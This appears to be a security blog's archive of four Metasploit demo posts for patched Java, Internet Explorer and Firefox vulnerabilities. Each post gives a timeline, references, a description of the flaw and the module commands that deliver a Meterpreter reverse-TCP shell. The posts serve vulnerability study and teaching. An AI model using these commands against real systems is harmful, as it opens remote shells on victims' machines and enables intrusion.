Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo

Exploits, Metasploit, , , , ,

Timeline :

Vulnerability discovered, exploited by James Forshaw during Pwn2Own 2013
Vulnerability fixed by Oracle the 2013-04-16
Details on the vulnerability provided by James Forshaw the 2013-04-19
Metasploit PoC provided the 2013-06-07

PoC provided by :

James Forshaw
juan vazquez

Reference(s) :

CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076
Oracle Java SE Critical Patch Update Advisory – April 2013
Context Information Security Pwn2Own blog post

Affected version(s) :

JSE 7 Update 17 and before

Tested on Windows XP Pro with :

JSE 7 Update 17

Description :

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Commands :

use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo

Exploits, Metasploit, , ,

Timeline :

Vulnerability fixed by Oracle the 2012-10-16
Details on the vulnerability provided by Rh0 the 2013-06-09
Metasploit PoC provided the 2013-06-12

PoC provided by :

Rh0

Reference(s) :

CVE-2012-1533
OSVDB-86348
BID-56046
Oracle Java SE Critical Patch Update Advisory – October 2012
Rh0 Pastebin

Affected version(s) :

JSE 7 Update 7 and before
JSE 6 Update 35 and before

Tested on Windows XP Pro with :

JSE 7 Update 7

Description :

This module exploits a flaw in the Web Start component of the Oracle Java Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of a browser user. This flaw was fixed in Oct. 2012 and affects JSE 6 Update 35 and before, and JSE 7 Update 7 and before. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. Alternatively an UNC path containing a jvm.dll can be specified with an own SMB server.

Commands :

use exploit/windows/browser/java_ws_double_quote
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability exploited during Pwn2Own 2013 by VUPEN the 2013-03-07
Vulnerability corrected by vendor the 2013-05-14
Details on the vulnerability provided by VUPEN the 2013-05-22
Metasploit PoC provided the 2013-06-12

PoC provided by :

Nicolas Joly
4B5F5F4B
juan vazquez

Reference(s) :

CVE-2013-2551
OSVDB-91197
MS13-037
BID-58570
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013)

Affected version(s) :

Microsoft Internet Explorer 6 through 10

Tested on Windows 7 Integral with :

Internet Explorer 8
ntdll.dll

Description :

This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).

Commands :

use exploit/windows/browser/ms13_037_svg_dashstyle
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Exploits, Metasploit, , , , , ,

Timeline :

Vulnerability discovered and reported to vendor by Marius Mlynski the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the(CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo